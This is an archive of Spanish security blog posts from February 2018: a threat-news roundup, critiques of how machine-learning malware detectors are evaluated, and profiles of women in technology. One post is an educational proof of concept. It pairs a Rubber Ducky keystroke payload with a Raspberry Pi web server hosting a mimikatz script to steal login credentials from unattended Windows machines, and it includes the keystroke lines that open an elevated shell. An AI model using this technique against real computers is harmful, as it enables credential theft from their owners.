software de minería estuvo en la red de la empresa de agua durante aproximadamente tres semanas antes de que se detectara. Más información en Eweek Malware destinado a interrumpir los Juegos Olímpicos de invierno El pasado domingo 11 de febrero, oficiales de seguridad de los Juegos Olímpicos de invierno confirmaron que habían sufrido un ciberataque. Sin embargo, tras analizar las muestras involucradas parece que no provienen de adversarios que buscan información de los Juegos, sino que estaban destinadas a interrumpirlos. La naturaleza destructiva de este malware apunta a inutilizar la máquina eliminando instantáneas, registros de eventos y tratando de usar PsExec y WMI para avanzar en el entorno. Más información en Talos Intelligence Noticias del resto de la semana Un error en la extensión de Chrome de Grammarly expone documentos de usuarios Grammarly ha corregido un error en su extensión de navegador Chrome que expone sus tokens de autorización a los sitios web, lo que permite a los sitios asumir la identidad de un usuario y ver los documentos de su cuenta. "Se ha determinado que es un error de severidad alta porque parece una violación bastante grave de las expectativas del usuario", dijo Tavis Ormandy, investigador del Proyecto Zero de Google. "Los usuarios no esperarían que visitar un sitio web les dé permiso para acceder a documentos o datos que han escrito en otros sitios web". Más información en Threat Post Explotan un 0-day en Telegram Messenger para distribuir malware Descubren una vulnerabilidad 0-day en la versión de escritorio de Telegram para Windows y que se estaba explotando para propagar malware que minaba criptomonedas como Monero y ZCash. Los atacantes engañaban a las víctimas para descargar software malicioso en sus equipos y así usaban su CPU para minar criptomonedas o servir como puerta trasera para que los atacantes controlasen remotamente la máquina afectada. Más información en Securelist Hackers explotan un 0-day en Bitmessage para robar claves de wallets de Bitcoin Los desarrolladores de Bitmessage alertan de una vulnerabilidad 0-day en la aplicación PyBitmessage y que ya ha comenzado a explotarse contra algunos usuarios. Según los desarrolladores de Bitmessage, afecta a las versiones de PyBitmessage 0.6.2 para Linux, Mac y Windows. "El exploit es desencadenado por un mensaje malicioso si usted es el destinatario (incluidos chans unificados). El atacante ejecuta un script pero también abre, o intenta abrir, una shell inversa remota", explicó el desarrollador principal de Bitmessage Peter Šurda. Más información en Bitmessage Otras noticias Un error en el sistema de archivos APFS podría conducir a la pérdida de datos de MacOS Más información en Bombich Software JenkinsMiner ha conseguido 3.4 millones de dólares en unos pocos meses comprometiendo servidores de Jenkins Más información en CheckPoint El grupo Coinhoarder robó 50 millones de dólares en una campaña de phishing a usuarios de Bitcoin Más información en Policía Cibernética de Ucrania ¡Regístrate a la newsletter!
20 de febrero de 2018
Rubber Ducky y Raspberry Pi: rápida y mortal en equipos "despistados"
Jaques Rousseau dijo: " El hombre es bueno por naturaleza, es la sociedad la que lo corrompe". Los usuarios que, disfrutando de permisos de administrador (enmascarados por el UAC), se ausenta de su puesto de trabajo sin bloquear el sistema, son buena parte de esa "sociedad". Tientan a que algunas personas buenas se vayan al lado oscuro de la fuerza. En esta entrada mostramos una sencilla receta que combina Rubber Ducky, Raspberry Pi y algunos scripts, para crear un ataque eficaz, rápido y potencialmente indetectable en sistemas Windows. Veamos cómo. Los dos elementos esenciales para el experimento Desde el TAGS, hemos querido hacer una pequeña prueba de concepto (PoC) con fines educativos, en la que demostramos cómo con una Raspberry Pi configurada con un par de servicios y un Rubber Ducky se puede comprometer un equipo Windows desatendido y desbloqueado con permisos de administrador. Evidentemente, es un escenario ideal pero que aun así supone dos retos: ser lo suficientemente rápido y, además, pasar inadvertido para los antivirus. Esta receta lo consigue con dos premisas: Enchufar y esperar. No es necesario teclear. Fileless: Sin tocar disco, las probabilidades de ser detectado por las soluciones habituales de seguridad (antivirus), se minimizan. El flujo es sencillo, levantaremos un servicio SSH y uno web en la Raspberry, con un móvil podremos acceder al sistema para encender o apagar el servicio web a voluntad. Dentro de la Raspberry, tendremos un script powershell con mimikatz para ejecutarlo en las máquinas objetivo y un usb Rubber Ducky para hacer la llamada al script desde las máquinas desbloqueadas y, en este caso, obtener su contraseña de inicio de sesión. Raspberry Lo primero de todo es configurar la Raspberry. Como sistema operativo se ha elegido el oficial, Raspian, pero se puede optar por cualquiera, según las preferencias de cada uno. Para abrir una conexión desde el móvil u otro terminal hacia la Raspberry se utiliza un servicio SSH. Por defecto, desde el 2016 viene desactivado, con lo que se deberá activar con los siguientes pasos: Abrir un terminal y escribir "sudo raspi-config" Seleccionar "Opciones Avanzadas" Navegar hasta SSH y habilitarlo Activando SSH en Raspberry Teniendo el servicio SSH activo se aconseja usar unas cuantas medidas de seguridad básicas para prevenir ataques. Obviamente, para acceder desde redes externas a la Raspberry se debe abrir el puerto correspondiente al servicio en el router y se podría usar un servicio como no-ip.org para no tener que aprender la IP pública en caso de que esta sea dinámica y/o cambie periódicamente. Además del servicio SSH procede a habilitar un servidor web, en esta caso se ha elegido lighttpd por ser un servicio ligero y rápido. Se instala abriendo en la Raspberry un terminal mediante el comando sudo apt-get install lighttpd. Si se quiere parar o iniciar el servicio basta con introducir el comando sudo service lighttpd start/stop. Dentro de la Raspberry en la ruta /var/www/html se añade el script de powershell para la ejecución de mimikatz, obtenido desde aquí (por cierto, aunque ponga que sólo es efectivo hasta Windows 8.1 funciona en W10); y se añadirá un fichero PHP con el siguiente código: Rubber Ducky USB Vamos a "armar" nuestro USB. Necesitamos un fichero .bin que se ejecute en cuanto se conecte. Es tan simple como crear un fichero de texto en el que se añadirá una serie de comandos para nuestro payload desde esta página y se convertirá al archivo necesario con el servicio que proporciona la página https://ducktoolkit.com/encoder/. Los principales comandos que se van a utilizar son abrir un terminal con permisos de administrador: GUI r STRING powershell Start-Process cmd -Verb runAs ENTER SHIFT TAB ENTER Llamar y ejecutar el script powershell de mimikatz (alojado en nuestra Raspberry) y volcar las credenciales: Resultado Con las configuraciones previas y tras obtener una vil oportunidad para actuar, procedemos a levantar el servicio lighttpd y conectar el Rubber Ducky en la máquina objetivo. Con esto, el proceso se realizará de forma automática y, muy importante: Enchufar y esperar, todo en menos de un minuto. El payload no tocará disco. Las credenciales, junto con la IP de la máquina objetivo, acabarán en la Raspberry. Objetivo cumplido. En el caso de máquinas Windows 10 el fichero volcado en la raspberry no nos mostrará la contraseña en texto plano sino “null” pero habrá un hash NTLM. Por supuesto, este hash puede descifrarse (si no es endiabladamente complejo) con la ayuda de herramientas como John the ripper y un buen diccionario. Resultados del ataque Las posibilidades con este tipo de herramientas son múltiples y permiten una gran variedad de diversos ataques, desde la prueba realizada en la que se roban las contraseñas, hasta instalar malware, establecer backdoors, etc. Existen múltipes ejemplos ya creados con payloads para que el ataque resulte incluso más sencillo. También es posible trabajar en la velocidad de ejecución y optimizar todo el proceso en varios aspectos. Como es natural, se soluciona con una mínima exposición de privilegios (evitar el uso de UAC y utilizar cuentas de no administrador) y bloqueando el sistema en todo momento cuando se encuentre desatendido, además de vigilar quién enchufa nada en los puertos USB. También te puede interesar: » Arducky: Un Rubber Ducky hecho sobre Arduino para hackear Windows #Arduino » Descargar Github DirtyTooth for Raspberry Pi Miguel Ángel Arévalo Telefónica Advanced Global SOC con la colaboración de Innovación y Laboratorio de ElevenPaths miguelangel.arevalofenoy@telefonica.com
19 de febrero de 2018
Historias de #MujeresHacker: Ángela Vázquez, Product Manager de Telefónica Aura
Esta semana presentamos la historia de Ángela Vázquez, Product Manager de Telefónica Aura, quien se dedica a definir el producto y conseguir que se despliegue con todos los requisitos en los países donde la compañía tiene presencia. Ángela nos cuenta su experiencia y su motivación para mejorar día a día su andadura profesional. Ángela Vázquez, una de las #MujeresHacker de Telefónica CDO nos cuenta su historia: Para que me conozcáis un poco más, soy una hacker gallega que ha acabado viviendo en Madrid casi de casualidad. En general, soy muy inquieta y un buen ejemplo de ello es que en estos últimos diez años he vivido en seis ciudades diferentes. El primer paso de mi carrera lo di en la Universidad de Vigo y continuó en Estados Unidos donde acabé Telecomunicaciones. Justo después de la carrera, me mudé a Barcelona para cursar un Máster especializado y trabajar a la vez en Indra Espacio, como desarrolladora en el despliegue de la constelación de satélites Galileo (llamémosle el “GPS” europeo). Más concretamente, en dicho proyecto generé la herramienta de validación remota para las estaciones de recepción LEOSAR (satélites geoestacionarios de órbita baja). La implementación final incluía control total de una cámara anecoica, recepción con procesado de señal, y presentación de los resultados en mapas con diferentes sistemas de coordenadas utilizadas en navegación por satélite. Después de esta primera experiencia, me hacía preguntas cómo: ¿por qué se eligen unos proyectos sobre otros?, ¿cómo se rentabiliza una tecnología?, ¿cómo se organizan los equipos para que los desarrollos tengan éxito?, etc. Como quería responder a todas estas incógnitas, decidí tomar un nuevo rumbo, primero con la consultoría (en Accenture y en Barcelona) y posteriormente con una startup (en iQube y en Vigo). En esta última etapa, aprendí mucho ya que en esa startup tenía responsabilidad end-to-end desde la evaluación de oportunidades de mercado, la definición de los productos (arquitectura, modularización, interfaces…), hasta el go-to-market (marketing, pricing, impacto en negocio, delivery, etc). Finalmente, iQube fue comprada por Centum y tuve la oportunidad de mudarme a Madrid para consolidar una unidad nueva centrada en tecnologías de vídeo. Durante esta nueva etapa, destacaría sobre todo mi aprendizaje sobre el ecosistema de las plataformas de vídeo (cabeceras, sistemas OTT e IPTV, cloud-DVR, STBs, main/second screens…). A la vez, me hice cargo de la cuenta de resultados de la unidad y lideré un equipo de hasta 47 ingenieros que daban servicio a los principales operadores telco. A raíz de este rol, me surgió una oportunidad en Ericsson, en la Unidad de TV&Media, como Service Delivery Manager. Decidí aceptarla para conocer más de cerca los productos punteros en el ámbito de vídeo. En paralelo, cursé un MBA que comencé en Madrid y finalicé en Estados Unidos. A principios de verano regresé a España y me replanteé de qué manera quería aprovechar todos mis conocimiento adquiridos durante estos años y a la vez, quería trabajar más cerca del cliente final y en productos en crecimiento (ámbito AI y Big Data). Actualmente, trabajo en Telefónica Aura y estoy muy contenta e involucrada en un proyecto como éste. Pienso que para ser una buena hacker, lo principal es tener ganas de mejorar el status quo, definir objetivos claros y no dejar de aprender. Si sigues estos pasos estarás más cerca de tu éxito personal. Ángela Vázquez Product Manager Aura @angelavquintian Si también eres mujer y hacker, cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. ¡Estate atento! Todos los viernes publicaremos un nuevo post de la serie #MujeresHacker. Te dejamos todos los que hemos publicado hasta el momento: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica » Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica » Ivonne Pedraza, experta en Seguridad de la Información de Telefónica » Marta Pérez, experta en User Research de Telefónica Aura » Elena Díaz, Data Scientist de Telefónica » María Domínguez, experta en productos de ciberseguridad en Telefónica » Ana Molina, Service Designer en Telefónica Aura » Mayte Miranda Cervantes, experta en ciberseguridad de Telefónica
16 de febrero de 2018
El ¿milagroso? machine learning y el malware. Claves para ejercitar el escepticismo (y II)
En el principio de la detección del malware se usó la firma. Después vino la heurística, la nube, el big data y en los últimos tiempos, machine learning y la inteligencia artificial. Métodos y técnicas que, convenientemente rodeados de los "sospechosos habituales" ( holístico, sinergias, disruptivo, etc.), podemos encontrar en casi todo discurso. Pero independientemente del negocio alrededor, la tecnología es neutra y no debería ser ni mejor ni peor de por sí, sino más o menos adecuada para resolver un problema. Lo que quizás erosiona la fama de una tecnología pueden ser los titulares forzados cuando se abusa de ellos con fines no puramente tecnológicos. El machine learning aplicado al malware es infinitamente valioso. Eso sí, a veces parece fallar la ejecución del experimento que pretende ensalzarlo. Veamos por qué y ejercitemos el escepticismo. Claves para detectar un titular con gancho ¿Cuántas muestras? Cuantas más mejor, sin duda. Pero a veces es complicado recopilar muestras, y más aún frescas. Las casas antivirus no tienen problema para esto pero… ¿y los análisis académicos? Existen conjuntos cerrados, como " contagioDump " que se mueven a veces entre las 200 muestras de familias muy concretas, con información que se actualiza de forma casi manual y lentamente. A nuestro entender, no son suficientes ni representativas de la problemática del malware actual. Otros estudios, por ejemplo, han basado su análisis en el éxito en la detección de 249 muestras, que no parece muy representativo del espectro del malware en general. También hay quien se queda con incluso menos: IMAD, de 2009 pretende clasificar utilizando machine learning, si un archivo binario para sistemas UNIX es malware o no. En sus experimentos, se utilizan solo 100 muestras de malware y 180 de goodware. Otro ejemplo de uso de machine learning realizado con 249 muestras maliciosas Claves para detectar un titular con gancho ¿Y los falsos positivos? Una clave para dar un buen titular si los números no acompañan, es ocultar los falsos positivos. Detectar el 100% del malware es sencillo, si te puedes permitir el lujo de equivocarte siempre. Pero, ¿y si ese "lujo" está determinado y acotado por un exiguo 2%? El juego se pone interesante. "Ahí fuera" en la industria de la detección de malware profesional es lo tolerado, alrededor del 2%. Equivocarte más a la hora de cazar malware o goodware es condenar cualquier sistema puesto que se perderá la confianza en su criterio a poco que aumente el volumen de uso. Por ejemplo, aunque en este estudio no utiliza "machine learning" estrictamente hablando, en "Classifying Anomalous Mobile Applications Based on Data Flows”. En este documento se realiza un estudio en el que se pretende clasificar malware móvil ayudándose de algoritmos genéticos. Los resultados del artículo y experimento resultan bastante pobres. No muestra la tasa de falsos positivos que se intuye muy alta en la tabla adjunta. Además habla de la detección dentro de una misma familia y no en general, algo que resulta mucho más sencillo y con lo que la tasa de acierto se infla artificialmente. Ejemplo realizado con muy pocas muestras y bastantes falsos positivos Contra los falsos positivos, se debe mostrar la tabla de confusión, donde quede claro la tasa de falsos positivos, negativos y verdaderos positivos y negativos, o valores que los relacionen como la precisión, la curva ROC, etc. Estos datos deben mostrarse claramente y con porcentajes. Pero no solo de las muestras de malware y su "determinación" viven los estudios. En general, dar por hecho que "cero detecciones" implica "goodware" sin incorporar la variable tiempo, redunda además en el fallo fundamental característico del antimalware tradicional (el falso negativo, o la muestra "que no se detecta"), y son problemas que si no son acometidos, hacen que cualquier sistema basado en ellos hereden sus problemas. ¿Qué otras fórmulas existen? Por poner un ejemplo, CAMP (Content-Agnostic Malware Protection) es un sistema que presentó Google en 2013 con el que Chrome prometía detener el 99% del malware. Se integró en 200 millones de usuarios de Chrome como prueba de concepto para detectar ficheros bajados. Según un estudio que señalaba el propio documento presentado por Google, con suerte un antivirus tradicional detenía entre un 35% y un 70% del malware que se intenta descargar un usuario antes de que dañase el sistema. CAMP se basaba en la reputación en la nube. Reputación no tiene por qué ser "machine learning" exclusivamente, pero sí que necesitaban, para el experimento, conocer la eficacia de sus sistemas en base a unas muestras previamente etiquetadas. Su método fue el siguiente: Seleccionaron 2200 binarios nuevos previamente desconocidos (muestras frescas). Lanzaron contra máquinas virtuales que juzgaron 1100 como goodware y 1100 como malware. Los enviaron todos a un sistema multimotor que analiza en estático y con buen criterio (por introducir la variable tiempo), esperaron 10 días para ver su evolución. De ahí se concluyó que el 99% de los binarios que Chrome reportó como maliciosos diez días antes, eran "confirmados" como malware por al menos un 20% de motores antivirus consultados. Este parece un método interesante de etiquetado, donde al menos se respeta la variable "tiempo" y se añade un alto porcentaje de motores para confirmar. Por supuesto hubo fallos. Decían que un 12% de sus binarios fueron marcados como limpios por el sistema CAMP pero luego resultaron ser malware según el criterio del 20% de los motores. O sea, aun así su tasa de falso negativo fue excesivamente alta. Se defienden alegando que la mayoría resultaron ser adware, cosa que CAMP deliberadamente no clasifica como malware. Con esta "excusa" volvemos a la zona gris en la que la que diferenciar el "malware" resulta un ejercicio casi filosófico. Y aun prestando especial cuidado a la tasa de detección, número de muestras y el tiempo, también se le podrían cuestionar ciertos aspectos. Recordemos que las propias casas antivirus suelen detectar muy poco a través de firmas estáticas (desde luego no es la estrategia que más éxito les reporta) y basarse demasiado en ellas es precisamente su "condena". También, que (aunque últimamente cada vez menos) las casas antivirus internamente usan también máquinas virtuales para análisis rápidos dinámicos (mala idea si no están convenientemente tuneadas). Con lo que, aunque más lentamente que CAMP, quizás marcaron como malware las muestras exactamente por la misma razón que lo hizo Chrome en un principio. Así, lógicamente la tendencia es a estar totalmente de acuerdo en ambos métodos y por tanto, heredar el aprendizaje con sus propias taras. Igualmente, aunque se use el 20% como umbral, no olvidemos que algunos motores se inspiran entre sí para las firmas. Si un motor reputado afirma que una muestra el malware, otros puede que también lo hagan para ahorrarse el análisis. El hecho de fijarse, por ejemplo, en ocho motores no es tan importante como que lo afirmen algunos más importantes, reconocidos por su tecnología única o específica de detección, que debería ser tenida en cuenta más que la “popularidad”. Conclusiones En resumen, la conclusión es que todos los sistemas que hemos señalado, quizás sean efectivos, pero lo que no podemos llegar a saber es "cuánto". Sabemos que clasificará como malware una buena parte de las muestras antes de que lo "confirmen" los antivirus, pero tenemos que tener muy presente: Si es a costa de un número de falsos positivos que los sistemas de detección tradicionales no se pueden permitir A costa de usar y entrenar con conjuntos excesivamente idealizados, escasos o anticuados y perder la partida en la calle, donde se juega en otra liga fuera de los despachos y laboratorios, mucho más hostil. A costa de que precisamente, se pretenda confirmar el éxito a través de los antivirus, algo que de por sí se supone que se está cuestionado o se pretende complementar. O sea, se pretenda preguntar a la tecnología que se desea mejorar, si finalmente hemos conseguido hacerlo mejor que ella misma. Lo sensato puede ser añadir (que no sustituir) estos métodos al arsenal contra el malware, como una forma eficaz y adicional, con lo que se ganará en velocidad y probablemente estreche la brecha. Pero desde luego no sabemos en qué medida ni el porcentaje exacto... afirmar que será del 99% o el 1% es buscar un titular con una metodología cuando menos, siempre abierta al debate. También te puede interesar: » El ¿milagroso? machine learning y el malware. Claves para ejercitar el escepticismo (I) Sergio de los Santos ssantos@11paths.com @ssantosv
13 de febrero de 2018
El ¿milagroso? machine learning y el malware. Claves para ejercitar el escepticismo (I)
En el principio de la detección del malware se usó la firma. Después vino la heurística, la nube, el big data y en los últimos tiempos, machine learning y la inteligencia artificial. Métodos y técnicas que, convenientemente rodeados de los "sospechosos habituales" ( holístico, sinergias, disruptivo, etc.), podemos encontrar en casi todo discurso. Pero independientemente del negocio alrededor, la tecnología es neutra y no debería ser ni mejor ni peor de por sí, sino más o menos adecuada para resolver un problema. Lo que quizás erosiona la fama de una tecnología pueden ser los titulares forzados cuando se abusa de ellos con fines no puramente tecnológicos. El machine learning aplicado al malware es infinitamente valioso. Eso sí, a veces parece fallar la ejecución del experimento que pretende ensalzarlo. Veamos por qué y ejercitemos el escepticismo. "XYZ": El nuevo sistema basado en machine learning, detecta el X% Probablemente nos hemos topado con este titular a menudo. En general, existen dos métodos de marchine learning: el supervisado, donde se sabe qué se debe buscar, (por ejemplo malware y goodware) y se trata de encontrar reglas generales o elementos (características) que definan estas clases. Por otro lado, el no supervisado, donde no se conoce qué se busca (no está "etiquetado"), sino que se intenta detectar qué características definen grupos más o menos homogéneos, y si solo son dos grupos, qué es anómalo o no por ejemplo. Trazar una línea entre lo normal y anormal debe hacerse de alguna forma. Si nos ceñimos al método no supervisado, resulta complejo saber qué es anómalo, y se necesitarán muchas iteraciones para una comprobación posterior. Iteraciones que habitualmente se traducen en participación humana o refuerzo puramente "tradicional" del análisis. Así lo hacía el MIT en su detección de anomalías en red que publicaron no hace tanto. En el mundo del malware, este enfoque es muy tendente a falsos positivos que deben ser validados por analistas. Reducir el coste humano en este proceso se busca desde siempre. Por eso las casas antivirus intentan minimizar el análisis manual y construir en lo posible un sistema de machine learning muy preciso que derive en el menor número de muestras que llegan a un analista humano. Cuando el analista saca nuevas conclusiones, el sistema se retroalimenta con mejores reglas para intentar que no se vuelvan a necesitar sus servicios. Aquí la apuesta de las empresas privadas es fuerte, y se juegan buena parte de su éxito en la eficiencia de este sistema, cuyos detalles suelen mantener "en secreto". En el caso de supervisado, para construir un clasificador las muestras ya vienen etiquetadas. Un conjunto suele ser malware y otro goodware que pasan por una caja de machine learning mezcladas. Si al salir de la caja, las muestras se encuentran lo más separadas posible… el sistema es bueno y se acude al titular. Esto no es extraño entre las publicaciones académicas sobre detección de malware. Pero la cuestión que deberíamos plantearnos es… ¿Qué muestras se toman? ¿Quién las etiquetó como malware y goodware? No existe la brujería: el engranaje matemático que al fin y al cabo se construye en un sistema de machine learning aprenderá lo que se le enseña. Si se le muestra malware muy "típico" que cualquier motor es capaz de detectar, no funcionará mucho mejor que los propios antivirus. Si se le enseña “goodware” de libro, titubeará demasiado ante programas que se salgan de lo común y será tendente al falso positivo. Por tanto, el éxito de un sistema basado en machine learning verdaderamente útil "ahí fuera" radica (entre otros muchos puntos de ejecución) en: ¿En qué te fijas para detectar malware? Peso del fichero, formato, librerías, opcodes, estático, dinámico, etc, etc, etc… esto es la labor del experto, definir convenientemente las "features". ¿Cómo y con qué alimentas tu sistema? ¿Con malware de hace años? ¿Qué familias? ¿Muy detectado por los motores? ¿Con cuántas muestras?... Esta segunda cuestión es fascinante. Y nadie dispone de la respuesta exacta. Las compañías antivirus en todo caso lo tienen claro: con lo más fresco posible, con la mayor cantidad de malware posible, confirmando por los analistas. El mundo académico, por el contrario, a veces sigue una estrategia diferente. Claves para detectar un titular con gancho: ¿Qué es malware? Pensemos un momento: si repasamos titulares y porcentajes, el problema del malware estaría ya resuelto. Entre todas las técnicas mostradas que anuncian (sobre el papel) detectar cerca del 100% del malware, ¿qué puede estar fallando como para que sigan existiendo las infecciones? No es una pregunta retórica. El malware es complejo, cambiante, difícil de tratar… una carrera hacia adelante y una lucha contra la tecnología y el intelecto del atacado, una quimera donde los límites están mucho más difuminados de lo que pensamos tanto por las circunstancias técnicas como por incluso circunstancias temporales o culturales. Sin embargo, para una máquina que debe convertirse en un detector/clasificador supervisado, la definición y las etiquetas deben ser diáfanas: un grupo de tu conjunto es goodware, el otro malware… dime en qué debo fijarme y eso aprenderé. Y, paradójicamente, la fórmula más común para esto es acudir a los… antivirus. Infinidad de estudios se basan en los propios antivirus para etiquetar el malware. Si lo detectan X motores, es malware. Si no, será goodware. Pero existen dos parámetros absolutamente fundamentales. ¿Cuántos motores deben detectarlos? ¿Qué motores exactamente? ¿Los más populares (o sea, lo más usados por cuestiones técnicas, marketinianas…?... ¿Cuándo deben detectarlas? ¿Muestras "frescas" o consolidadas? Son preguntas fundamentales que habitualmente no cubren el verdadero enigma del malware… la "zona gris". Este problema no es nuevo, ya lo sé. En las comparativas antivirus tradicionales, el conjunto de test se ha utilizado desde siempre como arma arrojadiza, solo que ahora, con el machine learning, vuelve a la palestra como parte fundamental. La zona gris está fuera de la "zona de confort" de los análisis y estudios El hecho de considerar como “malware” las muestras detectadas por unos tres motores o más, es aceptada la literatura sobre machine learning de malware en general. Sin embargo, la elección de un buen "umbral" de detección ( ¿por qué 3?) es un ejercicio complejo que aún no ha sido resuelto ni estandarizado, pero que puede hacer que los resultados de una investigación basada en la clasificación arroje resultados muy diferentes dependiendo de qué se considere malware o goodware, términos que no siempre distinguen correctamente los propios motores antivirus. Malware que, apenas dos días después, pasa de ser "goodware" a "malware típico". Un ejemplo representativo de cómo la variable tiempo influye en qué es necesario conocer para mejorar la detección Esa "zona gris" es en la que se mueve el malware fresco (apenas unos días ITW, o "ahí fuera"), funcional, poco detectado (pocos motores son capaces de detenerlo por firma) pero que más tarde acabará siendo moneda común y muy detectado. Esta franja temporal de acción es una ventana en movimiento, que es difícil perseguir y atajar. Y eso no suelen tenerlo en cuenta los estudios. Suelen reducir su "dataset" de estudio y análisis a un buen conjunto de muestras muy detectado, quizás desde hace años, y a otro de goodware muy común e "higiénico". El machine learning por tanto, aprenderá lo mismo que ya hace el propio antivirus y si bien el titular o conclusión de la investigación no será falso (… "se detectan el X% de muestras…") si que podríamos cuestionar qué problema real se está resolviendo: ¿Un problema de detección que ya tienen controlado los sistemas tradicionales de por sí? ¿Estamos investigando para detectar "lo de siempre" y "como siempre" pero con algo más de precisión? En algunos casos lo que se resuelve es un problema más bien académico: se mejora en el "problema de análisis previo". O sea, se demuestra que la técnica matemática X, es mejor que la Y usada sobre el mismo conjunto de muestras que usó el académico Z, en su estudio J. Esto no resulta ni bueno ni malo, es, efectivamente, una expansión de los límites del conocimiento y mejora de los procedimientos y técnicas, que no es mal que uno de los objetivos de la academia en sí mismos. En una pequeña indagación en estudios académicos, podemos encontrar algunos ejemplos de cómo varían los criterios a la hora de definir qué es malware, y cuántas muestras son necesarias para tomar en consideración un estudio: Ejemplo de un estudio en el que el malware se clasifica como tal si lo detecta un motor cualquiera Estudios que etiquetan muestras como malware, si son detectadas por un motor, cualquiera que sea, y esta será su "verdad". Teniendo en cuenta el mundo de los falsos positivos, la tasa de "equivocación temporal" que reina en este aspecto y que cualquiera de la industria puede corroborar… hace que el sistema se construya con una tara de base importante que es necesario matizar. Este otro estudio, por ejemplo, etiqueta como malware si una muestra es detectada por 4 motores o más. No importa cuáles. Quizás esto mitigue el efecto "falso positivo" pero… ¿Por qué cuatro? ¿En qué dato científico se basa esto? ¿Qué cuatro motores? Sabemos que hay motores que licencian la tecnología de otros y que por tanto, siempre detectan "en pareja" o el mismo malware… ¿Se han tenido en cuenta estos aspectos? Otros estudios intentan mejorar y apuntan a que al menos dos de 10 motores concretos, detecten algo como malware para establecerlo como su verdad.. ¿Por qué dos de diez? ¿En base a qué criterio se han elegido esos 10? Otros utilizan técnicas más "justas" para determinar si algo es malware y dárselo como material de aprendizaje a su máquina. En este ejemplo, se usa una especie de media en la que se tiene un umbral de 0.1 (empírico) en el que se relaciona el número de muestras y la cantidad de antivirus que la cazan. Sin duda curioso pero… ¿sabemos si es eficaz? ¿Y la variable tiempo? Ejemplo de fórmula con la que se intenta construir un dataset de malware más "preciso" En estudios donde se usa de forma similar el machine learning pero se pretende evaluar tráfico malicioso en vez de malware, el problema de tomar "un buen conjunto de muestras inicial" es incluso mayor. Buena parte de los experimentos que anuncia éxitos en detección de anomalías en red, basan su conjunto de muestras en el conocido KDD dataset. De él existen varias versiones: KDD Cup 99, DARPA 98 y NSL-KDD, todos de hace más de 15 años… ¿Son las mismas amenazas de hoy las que podemos encontrar en él? Con estos datos de base, cuando se arañan unas décimas al porcentaje de detección, en realidad, ¿se está compitiendo con el estudio anterior o de verdad se está ganando en detección real? Entendamos que las preguntas planteadas no tienen respuesta directa, no pretenden descalificar ningún estudio ni deben percibirse como retóricas. Muy al contrario, s e formulan para plantear debates. Precisamente un reto interesante al que miramos de frente en ElevenPaths desde el área de innovación y laboratorio, es afrontar abiertamente esa zona gris y estrecharla al máximo. Continuaremos la reflexión en la siguiente entrada. También te puede interesar: » El ¿milagroso? machine learning y el malware. Claves para ejercitar el escepticismo (II) Sergio de los Santos ssantos@11paths.com @ssantosv
12 de febrero de 2018
Día Internacional de la Mujer y la Niña en la Ciencia, 11 de febrero (Parte 2)
Hoy, 11 de febrero, es el Día internacional de la Mujer y la Ciencia y queremos celebrarlo desde ElevenPaths con vosotros. Por ello, os traemos la segunda parte de la acción que comenzamos ayer en la que seleccionamos a una mujer y a una niña para que nos cuenten qué entienden como tecnología y cómo ven el futuro de esta. Ayer entrevistamos a Constanza Fernández, u na #NiñaHacker que sueña con trabajar en la NASA. Hoy entrevistamos a Julia Llanos, una de nuestras #Mujeres Hackers de Telefónica y que trabaja como Data Science Manager para Aura. No te pierdas todo lo que nos ha contado: ¿Qué haces en tu tiempo libre? Voy a clases de baile (me encanta el hip-hop), paso tiempo con mis amigos y la familia… Además, me podría pasar todo el día viendo series y películas o jugando a juegos de mesa. ¿Qué recuerdos tienes de tu época de colegio? Recuerdo muchos momentos buenos de recreos y quedadas con amigos. También, el poder disfrutar de todo el tiempo libre que teníamos y despreocupaciones. Recuerdo también tardes haciendo deberes, estudiando con amigos, así como el tiempo que mi familia me ha dedicado siempre para transmitir sus consejos y conocimientos con todo el cariño del mundo. ¿A qué querías dedicarte cuando eras niña? Desde muy pequeña quería ser profesora, no sabía bien si de infantil o de alguna especialidad en concreto. Con los años fui apreciando las asignaturas de ciencias, como matemáticas, física o química hasta llegar a disfrutar con ellas, dedicándoles el tiempo que hiciese falta. Por ello, finalmente opté por la asignatura de matemáticas complementado con informática. ¿Quién es tu referente femenino en el mundo de la ciencia y la tecnología? Una de las mujeres que considero referente en el mundo de la tecnología es Sheryl Sandberg, directora de operaciones de Facebook. Sin embargo, también considero que cada una de las mujeres que lucha por conseguir su sueño y no se detiene pase lo que pase, es referente en este mundo. ¿Qué significa la tecnología para ti? Para mí la tecnología hoy en día lo es todo. Está en el centro de nuestras vidas, es la responsable de hacernos cada día la vida más fácil, de plantearnos nuevos retos anteriormente impensables, pero también nuevas preocupaciones... La tecnología es el presente, y sobre todo el futuro. ¿Por qué decidiste dedicarte a la tecnología? Siempre me ha encantado resolver problemas de lógica, acertijos, darle vueltas a las cosas hasta conseguir entenderlas… Cuando opté por estudiar matemáticas, pensé que informática podría complementar claramente esos conocimientos, proporcionando los medios para hacer pruebas y resolver problemas complejos. ¿En qué estás trabajando actualmente? Actualmente lidero el equipo de Data Science del equipo de Cognitive de Aura. Este equipo es el encargado de desarrollar modelos y algoritmos que permitan hacer a Aura más inteligente, sacando el mayor número de conclusiones y valor de diversos datos. ¿Cómo ha evolucionado la tecnología desde que iniciaste tu carrera profesional? La tecnología es algo que evoluciona y cambia constantemente a pasos agigantados día a día. Me atrevo a decir que gran parte de la tecnología que hoy en día es vital, ni siquiera existía al iniciar mi carrera profesional. Cuéntanos tu mayor logro, algo de lo que te sientas especialmente orgullosa. Personalmente creo que todavía tengo muchos retos por delante a los que enfrentarme y de los que aprender y mejorar. Estoy orgullosa de estar donde estoy y de haber podido aprender todo lo que sé hasta ahora, sin embargo, estoy más orgullosa de tener la oportunidad de mejorar eso y enfrentarme a muchos problemas y retos distintos. » Día Internacional de la Mujer y la Niña en la Ciencia, 11 de febrero (Parte 1) Julia Llanos Alonso Data Science Manager en Aura
11 de febrero de 2018
Día Internacional de la Mujer y la Niña en la Ciencia, 11 de febrero (Parte 1)
